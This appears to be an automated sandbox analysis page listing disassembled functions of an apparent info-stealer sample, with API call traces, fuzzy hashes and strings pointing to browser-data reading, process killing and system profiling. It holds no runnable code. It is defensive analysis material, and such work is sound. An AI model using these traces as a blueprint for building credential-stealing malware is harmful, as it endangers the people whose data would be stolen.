Opcode Fuzzy Hash: 75d72e7265c2b0bcdfeb4fd8a00493fe315c357100f507a1e1d65a562648f628
Instruction Fuzzy Hash: A88112729203089BCB19FBE8DD94DEE733AAF25340F50456DE116A6198EF346B48CF61

Function 0040D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00749878,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86

Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D801
lstrlenA.KERNEL32(00000000), ref: 0040D99F
lstrlenA.KERNEL32(00000000), ref: 0040D9B3
DeleteFileA.KERNEL32(00000000), ref: 0040DA32

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 490f1702b64547ba02e39242e97a7077727fb8834c4eac4a4ac7ceb114aa44c9
Instruction ID: 30f7704c13366a17925c5eaa4a94e79927efa66a8a92483c7baa761e0d0dbf9b
Opcode Fuzzy Hash: 490f1702b64547ba02e39242e97a7077727fb8834c4eac4a4ac7ceb114aa44c9
Instruction Fuzzy Hash: 848122719111089BCB04FBE1DD52EEE7339AF14314F50452EF407A6091EF386A9ACB7A

Function 0040F4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6

Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A

Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982

StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00421580,00420D92), ref: 0040F54C
lstrlenA.KERNEL32(00000000), ref: 0040F56B

Strings

moz-extension+++, xrefs: 0040F5AD
^userContextId=4294967295, xrefs: 0040F59C

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
String ID: ^userContextId=4294967295$moz-extension+++
API String ID: 998311485-3310892237
Opcode ID: 01cf0fa7e4d5aa125e4844cd0e1520a08c5a30bf36e05fbc1bfc3cb2691ed1c5
Instruction ID: 431312e06e4e118a9a68feb07ac8eaa96768a2afdec7ba1937323e72019175af
Opcode Fuzzy Hash: 01cf0fa7e4d5aa125e4844cd0e1520a08c5a30bf36e05fbc1bfc3cb2691ed1c5
Instruction Fuzzy Hash: 19516575D11108AACB04FBB1DC52DED7338AF54314F40852EF81667191EE386B9ACBAA

Function 022B9737 Relevance: 6.1, APIs: 4, Instructions: 89COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 022B9752

Part of subcall function 022B8FB7: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,022B9785,00000000), ref: 022B8FC2
Part of subcall function 022B8FB7: RtlAllocateHeap.NTDLL(00000000), ref: 022B8FC9
Part of subcall function 022B8FB7: wsprintfW.USER32 ref: 022B8FDF

OpenProcess.KERNEL32(00001001,00000000,?), ref: 022B9812
TerminateProcess.KERNEL32(00000000,00000000), ref: 022B9830
CloseHandle.KERNEL32(00000000), ref: 022B983D

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
String ID:
API String ID: 3729781310-0
Opcode ID: 0de5cb3b84569db27d3217fbf1ad12f67d16f90c4b13aa02d8c22dae1f7b6e71
Instruction ID: 67857c8d0d6b1298d325360cf64aaf16797c3f12c2b6300967e35de65ae4dcf8
Opcode Fuzzy Hash: 0de5cb3b84569db27d3217fbf1ad12f67d16f90c4b13aa02d8c22dae1f7b6e71
Instruction Fuzzy Hash: C23117B5A10248AFDF14DFE0CC48BEDB7B9EF45340F508459E606AA288DB786A84CF51

Function 004194D0 Relevance: 6.1, APIs: 4, Instructions: 89COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004194EB

Part of subcall function 00418D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0041951E,00000000), ref: 00418D5B
Part of subcall function 00418D50: HeapAlloc.KERNEL32(00000000,?,?,0041951E,00000000), ref: 00418D62
Part of subcall function 00418D50: wsprintfW.USER32 ref: 00418D78

OpenProcess.KERNEL32(00001001,00000000,?), ref: 004195AB
TerminateProcess.KERNEL32(00000000,00000000), ref: 004195C9
CloseHandle.KERNEL32(00000000), ref: 004195D6

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
String ID:
API String ID: 396451647-0
Opcode ID: 5250ca49cae3889dbddbcc3d4b08020f43e992c54a5c7bc587f30749fc7751a3
Instruction ID: faa3cbc47edc6d62fcde4c42a86d6f60d7c6cb9d9231cedff5acf80003c00c5b
Opcode Fuzzy Hash: 5250ca49cae3889dbddbcc3d4b08020f43e992c54a5c7bc587f30749fc7751a3
Instruction Fuzzy Hash: E3315C75E4020CAFDB14DFD0CD49BEDB7B9EB44300F10441AE506AA284DB78AE89CB56

Function 022B88E7 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON

Download Yara Rule

APIs

Part of subcall function 022BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022BA9EF

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205B7), ref: 022B8931
Process32First.KERNEL32(?,00000128), ref: 022B8945
Process32Next.KERNEL32(?,00000128), ref: 022B895A

Part of subcall function 022BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022BAC2C
Part of subcall function 022BAC17: lstrcpy.KERNEL32(00000000), ref: 022BAC6B
Part of subcall function 022BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022BAC79

Part of subcall function 022BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022BAB6C

CloseHandle.KERNEL32(?), ref: 022B89C8

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 1066202413-0
Opcode ID: 8b5492bb2172847200a0110b71b51f63116bc16bb71ede11aa5be0a2ca02365c
Instruction ID: c4aeeb568c1a8f470d762f21aff52fe2944f437a3cbd1194caa2a65a9c3127ed
Opcode Fuzzy Hash: 8b5492bb2172847200a0110b71b51f63116bc16bb71ede11aa5be0a2ca02365c
Instruction Fuzzy Hash: D9318D71911218ABCB25EF94CC44FEEB779EF49740F104199E10AA22A4DB346E84CFA1

Function 00418680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205B7), ref: 004186CA
Process32First.KERNEL32(?,00000128), ref: 004186DE
Process32Next.KERNEL32(?,00000128), ref: 004186F3

Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

CloseHandle.KERNEL32(?), ref: 00418761

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 1066202413-0
Opcode ID: 32a2c00083ef1341ac2e94a31bec5813c048ea59ad7237cf6e44a6152b238793
Instruction ID: 8f5abf7c5654a811b9b3f094c7d3948ba22bca0c3321aba4e2188e2e86b1b5ea
Opcode Fuzzy Hash: 32a2c00083ef1341ac2e94a31bec5813c048ea59ad7237cf6e44a6152b238793
Instruction Fuzzy Hash: F7315E71902218ABCB24EF95DC45FEEB778EF45714F10419EF10AA21A0DF386A85CFA5

Function 00414F40 Relevance: 6.1, APIs: 4, Instructions: 70stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B

lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414F7A
lstrcatA.KERNEL32(?,00421070), ref: 00414F97
lstrcatA.KERNEL32(?,007501B8), ref: 00414FAB
lstrcatA.KERNEL32(?,00421074), ref: 00414FBD

Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943

Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
String ID:
API String ID: 2667927680-0
Opcode ID: a80d5c8847ed11b1c06e57bc1001b675e7378c4db45037d7255a816d075cb529
Instruction ID: b2f553c39a7574946245b6cc91baeb706efbd34a5fe7bafabb54328a91102e52
Opcode Fuzzy Hash: a80d5c8847ed11b1c06e57bc1001b675e7378c4db45037d7255a816d075cb529
Instruction Fuzzy Hash: FA213DBAA402047BC714FBF0EC46FED333DAB55300F40455DB649920C1EE7896C88B96

Function 004187C0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E28,00000000,?), ref: 0041882F
HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E28,00000000,?), ref: 00418836
wsprintfA.USER32 ref: 00418850

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

Strings

%dx%d, xrefs: 00418847

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcesslstrcpywsprintf
String ID: %dx%d
API String ID: 2716131235-2206825331
Opcode ID: 124e357ede7c9a4ec2e38b5c0962ba134007384ad5c1c3eeb759acb43c381339
Instruction ID: e741bf7ca2fc1d65a497d39fe48fe123552d5275a0b8a8093fc8d321cf3eb0b5
Opcode Fuzzy Hash: 124e357ede7c9a4ec2e38b5c0962ba134007384ad5c1c3eeb759acb43c381339
Instruction Fuzzy Hash: 48217FB5A80208BFDB00DFD4DD49FAEBBB9FB49B00F104119F605A7280C779A900CBA5

Function 022B1A07 Relevance: 6.1, APIs: 4, Instructions: 53stringCOMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,00420DC0), ref: 022B1A2C
ExitProcess.KERNEL32 ref: 022B1A38
strtok_s.MSVCRT ref: 022B1A4F

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: ExitProcessstrtok_s
String ID:
API String ID: 3407564107-0
Opcode ID: 23663e118dc1d9675e857bc575fa0cf4eec126624f33d54e6aec62cd9d365414
Instruction ID: 3e1b386fc31f2828bba7cd81e44318231eec21304d57b4317c4e66f22dafacb9
Opcode Fuzzy Hash: 23663e118dc1d9675e857bc575fa0cf4eec126624f33d54e6aec62cd9d365414
Instruction Fuzzy Hash: 96116D74910209EFCB04DFE4D958AEDBBB5FF04345F008469E80967254E7706B14CF65

Function 022B7BE7 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E00,00000000,?), ref: 022B7C17
RtlAllocateHeap.NTDLL(00000000), ref: 022B7C1E
GetLocalTime.KERNEL32(?,?,?,?,?,00420E00,00000000,?), ref: 022B7C2B
wsprintfA.USER32 ref: 022B7C5A

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: Heap$AllocateLocalProcessTimewsprintf
String ID:
API String ID: 377395780-0
Opcode ID: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
Instruction ID: d61d34decaa7733073be9633ef3fd04516a56283373c216a5ffcd334ced4f1fe
Opcode Fuzzy Hash: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
Instruction Fuzzy Hash: 281139B2944118ABCB14DFC9DD45BBEB7F9FB4DB11F10421AF605A2280D3795940CBB1

Function 00417980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E00,00000000,?), ref: 004179B0
HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E00,00000000,?), ref: 004179B7
GetLocalTime.KERNEL32(?,?,?,?,?,00420E00,00000000,?), ref: 004179C4
wsprintfA.USER32 ref: 004179F3

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: Heap$AllocLocalProcessTimewsprintf
String ID:
API String ID: 1243822799-0
Opcode ID: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
Instruction ID: 87643aaeb61937c0b28f46190d625ee9f9fa63f6271d25fb840393839df263de
Opcode Fuzzy Hash: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
Instruction Fuzzy Hash: 6D1139B2944118ABCB14DFC9DD45BBEB7F9FB4DB11F10421AF605A2280E3395940CBB5

Function 022B7C97 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0064A248,00000000,?,00420E10,00000000,?,00000000,00000000), ref: 022B7CCA
RtlAllocateHeap.NTDLL(00000000), ref: 022B7CD1
GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0064A248,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 022B7CE4
wsprintfA.USER32 ref: 022B7D1E

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: Heap$AllocateInformationProcessTimeZonewsprintf
String ID:
API String ID: 3317088062-0
Opcode ID: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
Instruction ID: e997e13061aea18072df47f7d0bc2c1a594ab8149c7c23972c878929c60c7c11
Opcode Fuzzy Hash: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
Instruction Fuzzy Hash: 7F118EB1A45218EFEB208B94DC49FA9B7B8FB45761F1003AAF50AA32C0C7741940CF51

Function 022B3880 Relevance: 6.0, APIs: 4, Instructions: 45stringCOMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(?,00420F5C), ref: 022B3889
StrCmpCA.SHLWAPI(?,00420F60), ref: 022B38A3
StrCmpCA.SHLWAPI(?,00420F64), ref: 022B38BD
strtok_s.MSVCRT ref: 022B3938

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: strtok_s
String ID:
API String ID: 3330995566-0
Opcode ID: 88ee3256d646c21cc813880afdb35c02c7abfa0159f377c054558803c8e079b0
Instruction ID: 01a9b7a7a8af1c975fd22df0597b2a4179c66a8fd817e20c4bb9fb7b3cc80747
Opcode Fuzzy Hash: 88ee3256d646c21cc813880afdb35c02c7abfa0159f377c054558803c8e079b0
Instruction Fuzzy Hash: B01125B0E1020AEFCB15CFE6D848BEEB7B5BF08344F00C028E025A6254D7749500CF55

Function 022B9547 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(022B3D55,80000000,00000003,00000000,00000003,00000080,00000000,?,022B3D55,?), ref: 022B9563
GetFileSizeEx.KERNEL32(000000FF,022B3D55), ref: 022B9580
CloseHandle.KERNEL32(000000FF), ref: 022B958E

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSize
String ID:
API String ID: 1378416451-0
Opcode ID: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
Instruction ID: e22498c1e1b2eb9eb8b4e2c666e97aff94a920312759ff42a5eb5b5a618af8c2
Opcode Fuzzy Hash: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
Instruction Fuzzy Hash: 90F04F39E90208BBDB20DFF0DC49BDE77BAEB49750F11C654FA11A7284D67596418F40

Function 022B6D5A Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 022B6D31
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 022B6D4F
CloseHandle.KERNEL32(00000000), ref: 022B6D60
Sleep.KERNEL32(00001770), ref: 022B6D6B
CloseHandle.KERNEL32(?,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 022B6D81
ExitProcess.KERNEL32 ref: 022B6D89

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$CreateExitOpenProcessSleep
String ID:
API String ID: 941982115-0
Opcode ID: 5d3735d569cffe7bbea000e7acfc03b16a2d4300877d619867e3aa12521868c8
Instruction ID: c3ac85b88bba904712d3295d1f6c401210080f876bc8e8e584b8af163f61a835
Opcode Fuzzy Hash: 5d3735d569cffe7bbea000e7acfc03b16a2d4300877d619867e3aa12521868c8
Instruction Fuzzy Hash: C0F05E78A60307AEE712ABE1DC08BFD767AEF05781F105618F502A5194CBF05140CA56

Function 00406D40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 157COMMON

Download Yara Rule

Strings

`o@, xrefs: 00406DAE, 00406E5E, 00406DD2, 00406E94, 00406EAF

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID:
String ID: `o@
API String ID: 0-590292170
Opcode ID: 7ad59576bd09cc7eceacd48e5d7f84764234e902501c4ca3efc067249123903a
Instruction ID: c65cc5113f4fbf7636557f8b1f026e9f2285814709fd8c8344c4410f81c0aea8
Opcode Fuzzy Hash: 7ad59576bd09cc7eceacd48e5d7f84764234e902501c4ca3efc067249123903a
Instruction Fuzzy Hash: A66138B4900219EFCB14DF94E944BEEB7B1BB04304F1185AAE40A77380D739AEA4DF95

Function 00418B60 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60timeCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

GetSystemTime.KERNEL32(?,00749878,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86

Strings

cI@, xrefs: 00418BB1, 00418BE1, 00418BE4
cI@, xrefs: 00418B6C, 00418BE5, 00418BF0, 00418C04, 00418BD3, 00418BF3

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: SystemTimelstrcpy
String ID: cI@$cI@
API String ID: 62757014-1697673767
Opcode ID: 08129ed12c23d3f194c50dc719ff5aadd717ee4d4a74a7574ffe3a5ba5cd9d49
Instruction ID: 15f3dfc6f8d56a301bf8b2a7a9260479b6db203ca669f730be279af5ebf73ee3
